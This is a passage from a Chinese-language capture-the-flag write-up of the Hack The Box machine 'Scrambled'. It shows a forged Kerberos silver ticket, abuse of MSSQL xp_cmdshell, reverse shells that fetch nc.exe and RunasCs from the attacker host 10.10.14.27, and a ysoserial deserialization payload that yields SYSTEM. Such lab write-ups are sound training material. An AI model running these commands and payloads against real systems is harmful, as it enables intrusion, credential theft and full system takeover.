16
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -user-id 500 Administrator -spn MSSQLSvc/dc1.scrm.local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

19、导入本地票据,并使用票据登录mssql数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k dc1.scrm.local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SCRM\administrator  dbo@master)>

20、那这里就是数据库翻阅下了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
SQL (SCRM\administrator  dbo@master)> select name, database_id from sys.databases;
name         database_id   
----------   -----------   
master                 1   

tempdb                 2   

model                  3   

msdb                   4   

ScrambleHR             5   

SQL (SCRM\administrator  dbo@master)> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME   
----------   
Employees    

UserImport   

Timesheets   

SQL (SCRM\administrator  dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0   

SQL (SCRM\administrator  dbo@master)>

21、其实并没有什么特殊的发现,只是看到了一个用户账号密码,那就是常规的MSSQL数据库函数命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
SQL (SCRM\administrator  dbo@master)> SELECT is_srvrolemember('sysadmin');
    
-   
1   

SQL (SCRM\administrator  dbo@master)> EXEC xp_cmdshell 'net user';
[-] ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (SCRM\administrator  dbo@master)> EXEC sp_configure 'show advanced options', 1;
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE;
SQL (SCRM\administrator  dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1;
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE;
SQL (SCRM\administrator  dbo@master)> EXECUTE xp_cmdshell 'whoami';
output        
-----------   
scrm\sqlsvc   

NULL          

SQL (SCRM\administrator  dbo@master)>

22、到这里发现xp_cmdshell函数是可用的,那就开始尝试枚举和构造反弹shell吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c pwd"
output                
-------------------   
NULL                  

Path                  

----                  

C:\Windows\system32   

NULL                  

NULL                  

NULL                  

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c net user"
output                                                                            
-------------------------------------------------------------------------------   
NULL                                                                              

User accounts for \\DC1                                                           

NULL                                                                              

-------------------------------------------------------------------------------   

administrator            asmith                   backupsvc                       

ehooker                  Guest                    jhall                           

khicks                   krbtgt                   ksimpson                        

miscsvc                  rsmith                   sdonington                      

sjenkins                 sqlsvc                   tstar                           

The command completed successfully.                                               

NULL                                                                              

NULL                                                                              

SQL (SCRM\administrator  dbo@master)> 

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sqlsvc\Downloads; wget http://10.10.14.27/nc.exe -outfile nc.exe"
output   
------   
NULL     

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sqlsvc\Downloads; .\nc.exe -e powershell 10.10.14.27 443"


┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80                                        
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [08/Apr/2024 21:26:53] "GET /nc.exe HTTP/1.1" 200 -

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443                          
listening on [any] 443 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.11.168] 52616
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\sqlsvc\Downloads> whoami
whoami
scrm\sqlsvc
PS C:\Users\sqlsvc\Downloads>

23、到这里成功获取到一个shell环境了,但是,这个并不是第一个用户,不过我们在数据库里发现的用户,和系统上的账号似乎一样,那是不是可以尝试利用这个数据库里知道的密码去获取一个shell?

MiscSvc

ScrambledEggs9900

runas /user:MiscSvc ScrambledEggs9900 cmd

24、下面,我们使用的是github上的 runascs 这个工具,便于我们结合runas命令来获取反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\Users\sqlsvc\Downloads> certutil -urlcache -f http://10.10.14.27/RunasCs.exe RunasCs.exe  
certutil -urlcache -f http://10.10.14.27/RunasCs.exe RunasCs.exe  
****  Online  ****
CertUtil: -URLCache command completed successfully.

PS C:\Users\sqlsvc\Downloads> dir
dir


    Directory: C:\Users\sqlsvc\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       08/04/2024     14:23          68608 nc.exe                                                                
-a----       08/04/2024     14:40          51712 RunasCs.exe                                                           



PS C:\Users\sqlsvc\Downloads>

25、尝试获取反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿offsec)-[~/Desktop/tools/RunasCs]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [08/Apr/2024 21:44:10] "GET /RunasCs.exe HTTP/1.1" 200 -
10.10.11.168 - - [08/Apr/2024 21:44:10] "GET /RunasCs.exe HTTP/1.1" 200 -

.\RunasCs.exe miscsvc ScrambledEggs9900 powershell -r 10.10.14.27:4444 -l 3

PS C:\Users\sqlsvc\Downloads> .\RunasCs.exe miscsvc ScrambledEggs9900 powershell -r 10.10.14.27:4444 -l 3
.\RunasCs.exe miscsvc ScrambledEggs9900 powershell -r 10.10.14.27:4444 -l 3
[*] Warning: LoadUserProfile failed due to insufficient permissions

[+] Running in session 0 with process function CreateProcessAsUserW()
[+] Using Station\Desktop: Service-0x0-659c0$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4884 created in background.

PS C:\Users\sqlsvc\Downloads> 

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444           
listening on [any] 4444 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.11.168] 52756
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\System32> whoami
whoami
scrm\miscsvc
PS C:\Windows\System32>

26、那就获取第一个flag的值吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\Windows\System32> cd C:/Users/miscsvc/Desktop
cd C:/Users/miscsvc/Desktop
PS C:\Users\miscsvc\Desktop> ls
ls


    Directory: C:\Users\miscsvc\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---       08/04/2024     13:51             34 user.txt                                                              


PS C:\Users\miscsvc\Desktop> cat user.txt
cat user.txt
6f64590b0e88f8d45ed503061a74bf09
PS C:\Users\miscsvc\Desktop>

0x02 系统权限获取

27、下面的步骤,感觉超出了OSCP的考核的内容了,就以演练报告内容为主,做个粘贴吧

https://b0ysie7e.gitbook.io/articulos/write-up/hackthebox/2024-03-15-scrambled#silver-ticket-attack

https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html

28、操作流程步骤粘贴

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
PS C:\Windows\System32> cd C:/Users/miscsvc/
cd C:/Users/miscsvc/
PS C:\Users\miscsvc> ls
ls


    Directory: C:\Users\miscsvc


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---       03/11/2021     19:32                Desktop                                                               
d-r---       03/11/2021     23:40                Documents                                                             
d-r---       15/09/2018     08:19                Downloads                                                             
d-r---       15/09/2018     08:19                Favorites                                                             
d-r---       15/09/2018     08:19                Links                                                                 
d-r---       15/09/2018     08:19                Music                                                                 
d-r---       15/09/2018     08:19                Pictures                                                              
d-----       15/09/2018     08:19                Saved Games                                                           
d-r---       15/09/2018     08:19                Videos                                                                


PS C:\Users\miscsvc> cd Downloads
cd Downloads
PS C:\Users\miscsvc\Downloads> ls
ls
PS C:\Users\miscsvc\Downloads> 

PS C:\Users\miscsvc\Downloads> certutil -urlcache -f http://10.10.14.27/winPEASx64.exe winPEASx64.exe 
certutil -urlcache -f http://10.10.14.27/winPEASx64.exe winPEASx64.exe 
****  Online  ****
CertUtil: -URLCache command completed successfully.
PS C:\Users\miscsvc\Downloads> 

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [08/Apr/2024 21:53:29] "GET /winPEASx64.exe HTTP/1.1" 200 -
10.10.11.168 - - [08/Apr/2024 21:55:06] "GET /winPEASx64.exe HTTP/1.1" 200 -

PS C:\Users\miscsvc\Downloads> ls
ls


    Directory: C:\Users\miscsvc\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       08/04/2024     14:52        2387456 winPEASx64.exe                                                        


PS C:\Users\miscsvc\Downloads> 

����������͹ LAPS Settings
� If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: LAPS not installed


����������͹ LSA Protection
� If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#lsa-protection                                                                   
    LSA Protection is not enabled

����������͹ Credentials Guard
� If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#credential-guard                                             
    CredentialGuard is not enabled

����������͹ Cached Creds
� If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials              
    cachedlogonscount is 10

����������͹ Enumerating saved credentials in Registry (CurrentPass)

����������͹ AV Information
  [X] Exception: Invalid namespace 
    No AV was detected!!


����������͹ Checking KrbRelayUp
�  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
  The system is inside a domain (SCRM) so it could be vulnerable.
� You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges


  Name                                                                                                 CurrentUserPerms                                                       Sddl

  eventlog                                                                                             Everyone [WriteData/CreateFiles]                                       O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

  ROUTER                                                                                               Everyone [WriteData/CreateFiles]                                       O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)

  RpcProxy\49675                                                                                       Everyone [WriteData/CreateFiles]                                       O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)

  RpcProxy\593                                                                                         Everyone [WriteData/CreateFiles]                                       O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)

  sql\query                                                                                            Everyone [WriteData/CreateFiles]                                       O:S-1-5-21-2743207045-1827831105-2542523200-1613G:S-1-5-21-2743207045-1827831105-2542523200-1620D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-2743207045-1827831105-2542523200-1613)

  SQLLocal\MSSQLSERVER                                                                                 Everyone [WriteData/CreateFiles]                                       O:S-1-5-21-2743207045-1827831105-2542523200-1613G:S-1-5-21-2743207045-1827831105-2542523200-1620D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-2743207045-1827831105-2542523200-1613)

  vgauth-service                                                                                       Everyone [WriteData/CreateFiles]                                       O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)


 Scramble Sales Orders Server(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Autoload - No quotes and Space detected 

PS C:\Users\shiyan\Desktop\ysoserial-Release> .\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "c:\Users\miscsvc\Downloads\nc.exe -e cmd.exe 10.10.14.27 10086" -t
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN1FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUdNNlhGVnpaWEp6WEcxcGMyTnpkbU5jUkc5M2JteHZZV1J6WEc1akxtVjRaU0F0WlNCamJXUXVaWGhsSURFd0xqRXdMakUwTGpJM0lERXdNRGcySWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN1FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUdNNlhGVnpaWEp6WEcxcGMyTnpkbU5jUkc5M2JteHZZV1J6WEc1akxtVjRaU0F0WlNCamJXUXVaWGhsSURFd0xqRXdMakUwTGpJM0lERXdNRGcySWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 10086          
listening on [any] 10086 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.11.168] 58468
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

29、获取下flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
C:\Windows\system32>cd C:/Users/Administrator/Desktop
cd C:/Users/Administrator/Desktop

C:\Users\administrator\Desktop>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5805-B4B6

 Directory of C:\Users\administrator\Desktop

29/05/2022  21:02    <DIR>          .
29/05/2022  21:02    <DIR>          ..
08/04/2024  13:51                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  15,693,377,536 bytes free

C:\Users\administrator\Desktop>type root.txt
type root.txt
f4eb5479c772ab82e1eb74b48961f98c

C:\Users\administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/476

打靶记
#shooting-range
Scrambled-htb-writeup
https://sh1yan.top/2024/04/07/Scrambled-htb-writeup/
作者
shiyan
发布于
2024年4月7日
许可协议